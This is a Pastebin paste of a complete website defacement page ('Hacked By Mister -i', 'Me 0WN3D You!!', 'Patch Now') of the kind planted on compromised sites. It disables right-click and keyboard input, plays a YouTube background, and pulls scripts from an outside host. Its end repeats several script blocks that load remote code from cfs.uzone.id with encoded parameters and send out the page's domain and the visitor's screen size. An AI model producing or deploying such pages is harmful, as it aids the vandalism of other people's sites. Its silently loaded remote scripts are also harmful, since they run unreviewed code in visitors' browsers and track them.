Advertisement
Guest User

Untitled

a guest
Jan 21st, 2017
133
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 22.02 KB | None | 0 0
  1. <html oncontextmenu='return false;' onkeydown='return false;' onmousedown='return false;' ondragstart='return false' onselectstart='return false' style='-moz-user-select: none; cursor: default;'>
  2. <head>
  3. <title>.: Own3d :.</title>
  4. <link rel="icon" type="image/png" href=""/>
  5. <meta name="keywords" content="Owned"/>
  6. <meta name="description" content="Owned ">
  7. <meta name="author" content="Owned by ">
  8. <meta name="googlebot" content="all,index,follow">
  9. <meta name="robots" content="index, follow">
  10.  
  11. <link href="http://maxcdn.bootstrapcdn.com/font-awesome/4.2.0/css/font-awesome.min.css" rel="stylesheet">
  12.  
  13. <!-- CSS -->
  14. <link rel="stylesheet" href="http://karyamurid.com/jangandihapus/videoYoutubeBackground/css/normalize.css" media="all">
  15.  
  16. <!-- jQuery -->
  17. <script src="http://karyamurid.com/jangandihapus/videoYoutubeBackground/js/jquery-1.11.1.min.js">
  18. </script>
  19. <script src="http://karyamurid.com/jangandihapus/videoYoutubeBackground/js/device.min.js"></script>
  20. <script src="http://karyamurid.com/jangandihapus/videoYoutubeBackground/js/jquery.mb.YTPlayer.js">
  21. </script>
  22. <script src="http://karyamurid.com/jangandihapus/videoYoutubeBackground/js/custom.js"></script>
  23.  
  24. <style type="text/css">
  25. /*
  26. Tutorial Name: Modernize Your Site: Building a YouTube Video Background
  27. Author: Samuel Dalusung
  28. */
  29.  
  30.  
  31. /* GENERAL STYLES
  32. ================================================== */
  33. html {
  34. height:100%
  35. }
  36.  
  37. body {
  38. font:15px/23px 'Raleway',sans-serif;
  39. margin:0;
  40. padding:0;
  41. height:100%;
  42. width:100%;
  43. -webkit-font-smoothing:antialiased;
  44. -webkit-text-size-adjust:100%
  45. }
  46.  
  47.  
  48. p {
  49. font-size:20px;
  50. line-height:140%;
  51. text-align:center
  52. }
  53.  
  54.  
  55. ul li {
  56. display:inline-block;
  57. list-style:none;
  58. padding-right: 10px;
  59. }
  60.  
  61. .wrapper {
  62. z-index:600;
  63. position:relative
  64. }
  65.  
  66. .pattern {
  67. background-image:url(../images/pattern.png);
  68. background-repeat: repeat;
  69. background-attachment:scroll;
  70. width:100%;
  71. height:100%;
  72. position:absolute;
  73. top:0;
  74. left:0
  75. }
  76.  
  77. .divider {
  78. background-image:url(../images/divider.png);
  79. display:block;
  80. width:300px;
  81. height:35px;
  82. margin:10px auto
  83. }
  84.  
  85.  
  86. #colorize {
  87. color:#f1c40f;
  88. font-family:'Lato',sans-serif;
  89. font-size:40px
  90. }
  91.  
  92.  
  93.  
  94. /* BIG VIDEO BACKGROUND
  95. ================================================== */
  96. .big-background {
  97. z-index:550;
  98. text-align:center;
  99. height:100%;
  100. min-height:100%;
  101. position:relative;
  102. overflow:hidden
  103. }
  104.  
  105. .big-background .big-background-container {
  106. width:830px;
  107. max-width:100%;
  108. display:inline-block;
  109. position:absolute;
  110. top:50%;
  111. left:50%;
  112. -webkit-transform:translate(-50%,-50%);
  113. -moz-transform:translate(-50%,-50%);
  114. -ms-transform:translate(-50%,-50%);
  115. -o-transform:translate(-50%,-50%);
  116. transform:translate(-50%,-50%)
  117. }
  118.  
  119. .big-background-title {
  120. font-family:'Raleway',sans-serif;
  121. font-size:78px;
  122. color:#fff;
  123. font-weight:300;
  124. text-transform:uppercase;
  125. text-align:center;
  126. margin-bottom:22px;
  127. padding-top:20px;
  128. display:inline-block;
  129. background-attachment:scroll;
  130. background-repeat:repeat-x;
  131. background-position:top center
  132. }
  133.  
  134. a.big-background-btn {
  135. font-family:'Lato',sans-serif;
  136. font-size:13px;
  137. text-transform:uppercase;
  138. text-decoration:none;
  139. color:#fff;
  140. background:transparent;
  141. border:2px solid #fff;
  142. padding:10px 14px;
  143. cursor:pointer;
  144. letter-spacing:2px;
  145. text-align:center;
  146. display:inline-block;
  147. -webkit-transition:.4s background ease;
  148. -moz-transition:.4s background ease;
  149. -o-transition:.4s background ease;
  150. transition:.4s background ease;
  151. }
  152.  
  153. .big-background-btn:hover {
  154. color:#fff;
  155. background:rgba(255,255,255,0.20)
  156. }
  157.  
  158. .big-background-default-image {
  159. background:url(../images/sunset.jpg);
  160. background-repeat:no-repeat;
  161. background-position:center center;
  162. background-size:cover;
  163. width:100%;
  164. height:100%;
  165. z-index:0;
  166. backface-visibility:hidden
  167. }
  168.  
  169.  
  170.  
  171. /* ABOUT SECTION
  172. ================================================== */
  173. .about-section {
  174. font-family:'Lato',sans-serif;
  175. color:#7f8c8d;
  176. background:#fff;
  177. padding:60px 20px
  178. }
  179.  
  180. .about-section-container {
  181. text-align:center;
  182. padding-bottom:50px
  183. }
  184.  
  185. .about-section-title {
  186. font-family:'Raleway',sans-serif;
  187. font-size:40px;
  188. background:#fff;
  189. color:#3d566e;
  190. padding:0 35px;
  191. margin-bottom:22px;
  192. background-attachment:scroll;
  193. background-repeat:repeat-x;
  194. background-position:center center;
  195. text-transform:uppercase
  196. }
  197.  
  198.  
  199.  
  200. a.about-section-btn {
  201. font-family:'Lato',sans-serif;
  202. font-size:13px;
  203. text-transform:uppercase;
  204. text-decoration:none;
  205. color:#34495e;
  206. background:transparent;
  207. border:2px solid #34495e;
  208. padding:10px 14px;
  209. cursor:pointer;
  210. letter-spacing:2px;
  211. text-align:center;
  212. display:inline-block;
  213. -webkit-transition:.4s background ease;
  214. -moz-transition:.4s background ease;
  215. -o-transition:.4s background ease;
  216. transition:.4s background ease;
  217. }
  218.  
  219. .about-section-btn:hover {
  220. color:#fff;
  221. background: #34495e;
  222. }
  223.  
  224.  
  225.  
  226. /* SMALL VIDEO BACKGROUND
  227. ================================================== */
  228. .small-background-section {
  229. font-family:'Raleway',sans-serif;
  230. padding:100px 0;
  231. position:relative;
  232. width:100%;
  233. overflow:hidden
  234. }
  235.  
  236. .small-background-container {
  237. position:relative;
  238. text-align:center
  239. }
  240.  
  241. .small-background-title {
  242. font-size:40px;
  243. color:#f1c40f;
  244. font-weight:300;
  245. z-index:10;
  246. display:inline-block;
  247. text-transform:uppercase;
  248. margin-bottom:20px;
  249. margin-top: 20px;
  250. position:relative;
  251. background-attachment:scroll;
  252. background-repeat:repeat-x;
  253. background-position:top center
  254. }
  255.  
  256.  
  257.  
  258. /* SOCIALS
  259. ================================================== */
  260. .socials a {
  261. color:#fff
  262. }
  263.  
  264. .socials a:hover {
  265. color:#bdc3c7
  266. }
  267.  
  268.  
  269.  
  270.  
  271. /* MEDIA QUERIES
  272. ================================================== */
  273.  
  274. @media screen and (max-width: 768px) {
  275. .about-section-title {
  276. line-height:1
  277. }
  278. }
  279.  
  280. @media screen and (max-width: 480px) {
  281. .big-background-title {
  282. font-size:58px
  283. }
  284.  
  285. .small-background-title {
  286. line-height:1
  287. }
  288.  
  289. /*.player{ display: none;} -> If you want to remove the video bg on a specific viewport w/o plugin*/
  290. }
  291.  
  292. @media screen and (max-width: 360px) {
  293. .big-background-title,#colorize {
  294. line-height:1
  295. }
  296. }
  297.  
  298. @media screen and (max-width: 320px) {
  299. .small-background-title {
  300. font-size:30px
  301. }
  302. }
  303.  
  304. .percobaan{
  305. -webkit-animation: noise-1 .2s linear infinite;
  306. animation: noise-1 .2s linear infinite;
  307. }
  308.  
  309. .error {
  310. -webkit-animation: noise-3 1s linear infinite;
  311. animation: noise-3 1s linear infinite;
  312. overflow: default;
  313. }
  314. @-webkit-keyframes noise-1 {
  315. 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  316. 10% {opacity: .1;}
  317. 50% {opacity: .5; left: -6px;}
  318. 80% {opacity: .3;}
  319. 100% {opacity: .6; left: 2px;}
  320. }
  321.  
  322. @keyframes noise-1 {
  323. 0%, 20%, 40%, 60%, 70%, 90% {opacity: 0;}
  324. 10% {opacity: .1;}
  325. 50% {opacity: .5; left: -6px;}
  326. 80% {opacity: .3;}
  327. 100% {opacity: .6; left: 2px;}
  328. }
  329.  
  330. @-webkit-keyframes noise {
  331. 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  332. 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);}
  333. 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);}
  334. }
  335.  
  336. @keyframes noise {
  337. 0%, 3%, 5%, 42%, 44%, 100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  338. 4.3% {opacity: 1; -webkit-transform: scaleY(1.7); transform: scaleY(1.7);}
  339. 43% {opacity: 1; -webkit-transform: scaleX(1.5); transform: scaleX(1.5);}
  340. }
  341.  
  342. @-webkit-keyframes noise-3 {
  343. 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  344. 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);}
  345. 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate(60deg);}
  346. }
  347.  
  348. @keyframes noise-3 {
  349. 0%,3%,5%,42%,44%,100% {opacity: 1; -webkit-transform: scaleY(1); transform: scaleY(1);}
  350. 4.3% {opacity: 1; -webkit-transform: scaleY(4); transform: scaleY(4);}
  351. 43% {opacity: 1; -webkit-transform: scaleX(10) rotate(60deg); transform: scaleX(10) rotate(60deg);}
  352. }
  353.  
  354.  
  355. </style>
  356. </head>
  357. <body>
  358. <section class="big-background">
  359. <br>
  360. <center><br>
  361. <font size=12 color="red">
  362. </div>
  363. <div class=percobaan><font face=Wallpoet>
  364. <b> : : Hacked By Mister -i : : </b> <br></font>
  365. </div>
  366. </font>
  367. <coba style="opacity:0.8;filter:alpha(opacity=40)"
  368. onmouseover="this.style.opacity=1;this.filters.alpha.opacity=100"
  369. onmouseout="this.style.opacity=0.4;this.filters.alpha.opacity=40"><br>
  370. <font size=5 color=red>Diam Bukan Berarti Tiadk Ada !!!</font><br>
  371. </div>
  372. <font size="4" color=darkred>Me 0WN3D You!!</font>
  373. </div>
  374. </div><br>
  375. <font color=darkred size=4> ~ Patch Now.. !!! ~
  376. </center><a id="bgndVideo" class="player" data-property="{videoURL:'https://www.youtube.com/watch?v=1ZIGLm5cuDo',containment:'body',autoPlay:true, startAt:0, opacity:1}"></a>
  377. <div class="pattern">
  378. </div>
  379. </section>
  380. <script type="text/javascript">
  381. if (self==top) {
  382. function netbro_cache_analytics(fn, callback) {setTimeout(
  383. function() {
  384. fn();callback();
  385. }, 0);
  386. }
  387. function sync(fn) {
  388. fn();
  389. }
  390. function requestCfs(){
  391. var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");
  392. var idc_glo_r = Math.floor(Math.random()*99999999999);
  393. var url = idc_glo_url+ "cfs.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582H6x5iDAuv2B9SThwqRvgrNaC09AmHvBR2ycvZZ4wXX%2f7M%2bYlxX%2f6ABflPbSopfXE4KH%2b43Tj1%2b9vzOk9OoGIbDFf3ZMVAqtwE%2fJXk%2b18omGaK46jDraoOh6bGz6yH6BMfGNfi3Z8uz5bFiHC3Poxd6aPB9v%2bmaNe%2fvrhcc0n4bW%2bNPB4WkaMOmQ8hfQkPxPtLOXM8rvGMBPNl3dBA5FvjIH5i4k9iTMWd2WBB2t2k%2fDyUT4EaLH7C7ygVChlO%2fSg7CQI09Aocnx818dITYa2kZnpRHV1oFvzbHB6a%2bPP%2fDb7ewTPcSQNQ03I75orPPaVz3akfTiOQaM7PNU4Q8NLHXyYp5vQXYsWz0lsm0A2aAvOjx7VqHEWBYSjDSjuV7sISlmG%2br09FakkNfW6GJz4DWFT5FakzTXwIU98yaSGEBamlMre3ues8w0dbFhfMiiNPQ6tXWrH4fofyfvtBcTRFY0GPvCMHAcuTZ%2baroSIwg155CwvlX0aU3YrvZLzILk5M6M4rICIBC2CuN7iezDShOsXTtBLjwGTVUmZPkxVmF6WIOvoXL6sLg3A7VPzUJY6Opj%2bCDwPm7m" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;
  394. var bsa = document.createElement('script');
  395. bsa.type = 'text/javascript';
  396. bsa.async = true;
  397. bsa.src = url;
  398. (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});
  399. };
  400. </script>
  401. <script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582H6x5iDAuv2BNqOKZ1U0KuXtj%2fGCqSmxw99kSz1SK6QUzeIOau43YpMdE2hWfKPkk7any9aICXWpf2RZ5j4JI6HP%2fqLRcldRViMg2N5G%2bYWrYs23hj4bGqqsqdgskX29fB2iBE%2b%2byPM3VvSVtnWfipXtRQkPbfmB16JSqVQu%2bO9i8x94Jf7SWWTsMembwqfNmyWr6BH16w7s6MsPkhJZjVQVeauRfqaMlF96XjUWAlt1fdlnZRpCiP7F5lJdshmU6CfTfg%2bgh%2bEXOQ%2fFncNtYWe%2fDyDeL27pEOMn5tI%2bAzj3LVzOd00rWoPsUhpBbN7AK%2fTxv%2fSOlwmgfTBegt8qwDVTzMamjVAFZjOWRH9uKBe9lxHiaKPUT%2bcb52iNo2rlkiL57ifTT9dI8Jok7bb9bAwsJ%2blBy9t45AKNtx97gVLYzHfxjCTLw4bzOqIBUkidzbcIqogba66hJsHY8k8BAzw0EbosBsxIiCyTqtuovyZZnfyPewkT9ThRJC0ZGzwFWQLUT1IA5CObQA7xNUxmvuGyHeKiHxWnY3ExVHODtm30MFvMr6I2qATtXAww7MuT2y7OLSUPoLJiK4KLz2KN2Hs024sYdUQK6q75ePNtYCAJVarlr7uFwTGq66VZPftS4SoLp%2fhmUjsc" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">
  402. //<![CDATA[
  403. (function() {
  404. var _analytics_scr = document.createElement('script');
  405. _analytics_scr.type = 'text/javascript'; _analytics_scr.async = true; _analytics_scr.src = '/_Incapsula_Resource?SWJIYLWA=2977d8d74f63d7f8fedbea018b7a1d05&ns=6';
  406. var _analytics_elem = document.getElementsByTagName('script')[0]; _analytics_elem.parentNode.insertBefore(_analytics_scr, _analytics_elem);
  407. })();
  408. // ]]>
  409. </script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582H6x5iDAuv2BemBbmOEmgoARz%2fNkQnefv0SONuyMDkFrTFT1zgxB4Xv%2bbkIxaZu3s0a3ht3Uz0aw%2bLChoSpIaJhvFmoG7enY%2fzg00B3zSUjXf1ftK%2f0tFWY3hk54FIeQE%2bf31E6YrSdxEJi1mFK5Sobvwzp%2fQH9NfmPNjuQwVlzYkLbkBXlGHEVR3Tkchmn%2fB185ekkd94ANiLgFXn2Fs6GCU33mhvUDViTy1fTQqgnYkU6wY%2fXxTuRF%2bwENqiwf8MeflK5peGmUEKRLDamGZA90Dpr8Uy1NuztSsNZwmCNDQzkDRZwBZ47rHVCf%2fpYD3pvZ686s%2bsWhezGnYt401iJ1saqS5kwGJNH4B6pDytv0Kkj0rd%2fMKZNrzbI%2biQwE6xI5MHySfNQoMd0TDSQs1X6xAgi7bWL7El7C6IuZj12FFYwDB5lmGGl07hJVz%2f%2bSBeAxwrq9VltQNxKIRgUCPun7EhigzLr02%2f6bK1nSl0AUWoaUXhADA4dh9tepK1Ay9KxVcY50k4DumfCh0Cub55E1qYAbPrXCzr0lKXX27hlMfJi0UFDH5boXmWDckb5lcG7sdHgXvo20" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582H6x5iDAuv2B0P3mDwxgPAlUtfZlHDI6HP%2bQBV90tOu2wxNjKGVTfOoNhbw6vmisgV%2bClVYpliw2za0MOCuxr7rrsMC5u6BtlbtZvRLOfrC3uzvN53wzIv%2fAVMZe3CS91billK10qe5Iz3WRxkV4%2bJI7h4cPe2OMHot0vNfu2c6%2bsOufV3mGmj5Ty7JmymO5AnCVjdsWimus3H9LTa6v2Ru%2b2dRiiiiysqmEuvPNmDvW8JqEgfpiFLs7wmEwKxk3YQGc2ARwEP3CAFoD%2fqgfP1RKCJ%2b6IJCL5cln%2bBdaJON76BJeoHij1DNl03tDjlhjGlX%2bvKkfsrC%2bTkQ7EQLAiSdNrWdm0T8ArBfOu1Jmo6B8Rnwjz1mKB4UiauVOcHkzww4cKXPfufEAh%2b%2b0KlF%2f7UI0zCHaBb16Z4hMt5xkeBMEQdQXAhq6AyuFFW%2fOBGEe5OT%2b6bJK7igo94TLyoN0ZYG6UGQHsZkhaEOqSz64yYGjLnsXDMpuwVAWKqTZknL6YpJqOMbM1fQo8QpyJucZO7gziLU%2b4oAvwjTrJ3iVq1RbrPVoweqrmhCVNC06u8v3CpWELsy4iAY7" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKzxcF6I3jFualnXJSInsWKOoj1DOeYOqY9IidbrJEDoK3RdYfV3i8wT%2fGz43ME2OOC0Jn7ks7UpzpQFIa037Ij3phB3yUYjjD4bxo31AdIPBDTcd%2b%2fqUc9Z%2fMj%2f6NnJ3pFEcOWF0wVYsh%2fbTg8%2b1g6ZB9i4GJ0hTyvtAM7CL6pHuicPI7K8fEZ%2bHKWE9%2fmhFpMTvcUlUwvGdx%2f%2fPRAOuhNch2uOI2RObhO%2bSBMb%2fR2I%2fuU%2f4NSOUgDHNzAMFLYCyD%2b%2fxxDSg6rYixGOXGRYmD6Ehbm%2fImVehXlkzS5eDMvLH2gwwi0LiS22bBgbgJM%2bjJkaKOMhC%2f%2fmOSDcCqBeM7D0vKuloouJ%2fViYl8Bu%2f%2byPhH8OEsmSGJyOUE0RfDXwRYLhsXgu0ur37ueiXTrLypuC%2fo6ve32%2f%2fOpmkzLsoPRHryKvMlrWUPcGOPcda1%2bv%2bbdGt%2bIBv451zSEs5La0m2y7Pt5qN%2b98Nd2MDl4AH8hMLzmujegDmczK7Rs%2b7i1hdRvZDB0VwPQzF%2fGA9Rw0VpjaU4f7Q9QvQ6" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs2.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKKHqv8wjPCcSIj%2bVV0ILU27gymE%2bqSBdQb%2f1p83Fj2j93xGyqevtad%2bFuj2m7wnbDcsmhgxBzGCPkTyg9mHa%2bOMfl1lHCZi%2f2CFLlhOqfl15erJq%2bJEtdoVCtHGNI21dkFRxLmIpR4NsRxsoYky0EbbVUSiTWblNJhtyCfKuMqyan6AEngmtrHXcJyY9n6Jtgz69lZOgT44tti7yU%2bI4UPln1N3v5sJ435%2bveMehztyN7EHT3uFfcVpx8swueNAZ%2bP%2b2T5SGROftceV2y5bWQ3H35KR1mcO34wf2deDwgdIzD%2fwIZimzrr7RwRyFS1lZs9N7O7Ar8mvyyLLH8Y7sxn37LRdes15e%2f6XSH%2fHbcwKXvyEffnO38wqcQ0QZEotW3M2N0dlrvnP5ORnyTjQVKZgBhNoWt4s%2fgbC0YThGdrCjlDs8GrD1Bw96Swwj4k8PLJJj8XPoXhRvigw%2f4uQS6wtWwArN%2fTYX2yO5LhpP5jsao%2bKs9sM6mSu4Nrn%2fgOd1rLghJgV6N5ac%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs1.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKcu3vhyo8nBCVc%2fr0tXJiU%2bKej%2fdptd8ILS%2bXda2dIXvwhnQv8eWCmBR2jW5JR%2b4O9g3WS2HBFUGBRfqx%2fPp9Xul8nzjja0g6xcOoJKnaN5eFgIBOeUCF%2fN9LZO%2bafgqwv4OUFVv%2bp39innA4h7ozF60%2fySgNY0lEMZBfuJF2CCNVePes2bFpX%2f48%2ffFQmT2a%2fObDTTVZILFdxQh89W2TUufPrgUOHRovj80ASjgQCpKc69xyiAgtlCEp%2bFrSoyvmgHNr%2b9%2bxntImynpIzIb0xjrMBhVB7lvHjYfmCboQIkczbEM2TDb%2fO6vG%2fbHaP2xV%2fh6knPRwbP3qaNYoeT4PqT8eLgnx5ZXkJYeFy5PL7gX1cvkA4%2fIiUeQPCeOdYgAVFq%2fJRUhPlIR52J81n5cnj%2bv0JGGB8hVflqi0DyJWaG0vK5JzYHk%2fhrucxkaAy%2bd5LSczsk0gsiBlhnuiVW1MMOTqEgg4YZ5x" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs1.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKARD5tn7ILp1tZHJEBlWrgYvztS5GcvV3rBUbOvm6E3tghbvM0WA4caugmrUPResdoyEiEkmfWQEo3CQTXyJwo63SFFp7HKjBtWa1ziS9rJWQTCGqLhbA%2bfSI%2fzuIFYuCsLEAjWLxSG6jvuDPN2p9q4RqwTXHw3zEkRmDJuSKrnrTMF%2bLbCXpa4fcWhaF2F%2bqCHMiT%2f%2fChgO5r6PwiNwkrYykW%2bSky%2bxRJvyAWts0HEgSKku7ZS1tatMPDDgMNAirDeVZheVtuf6AsFoEWNccO6umhVn45hb%2bzN7%2fZTHDf4qn9iyxMhJKukn2AjEdd7rF%2fqDI34CYSw9yIkrRhFcO8T9JTDi4TkzvandW0We6u%2fK0NxiTqU7dBvspspEu1WUs1ni72tvpTBQSfII7sIj6IKRTt%2bY1NiUOxmr3PdcihyI8ms65nxIfYr7bj2RNTQFDrxnXKdiJXpUycTjAG30jcvyhx7Ig3acsSxXb1sXr%2f1GJ7r99pCZMlYW%2fXkDEeR2VlpVa%2fech0jg%3d" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script><script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs1.uzone.id/2fn7a2/request" + "?id=1" + "&enc=9UwkxLgY9" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582CL4NjpNgssKen1FGmIgkR8Xye%2bT80%2bcxod3Mfi7KbVZBERSv9tiw6jAK2MvSwPIKM7OvFlATJHcV2PCb6SMX6dEedmz3ICCZ3ZHv5PXnb65JOS%2br2b6YbSUH1DPemq3rS3suBbDOxOuc8zqDfs6mYevcsuUbc3oRO0H6ENXRGs67kst5VT7TqMe1yb9vXdpZQbLKfam8JhbQRtQFpZt%2fJXM8XpjwB3bZkMC%2bHJhP%2bH%2f3pn5IWIPWnANinwGWutpNQoB3QrhzTdmalNLj9DPhA7tt%2fQOFNQohywNYqq%2fDtNbFdpQ%2fN6uXV18q1M8LyBsY9noNhP6I%2brtzHUOxPelS7sAlQE%2fxBXmX2Gd2sk3x9SwWrY%2f8f5NT79ZvHNUB6KdLwaHIiKy%2btQp1wty4aASlql4ZgDXi9531%2bR3fWvm1x3uqwL137dvfTsVwug%2bDxiNSNwkbQJwZVBjS59DgXWeHYb9PR1nIhnjgBlRIDpuCuQ4RkTySq6rK%2feaqow%2fpExmKfbbzvLzeCub" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>
  410. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement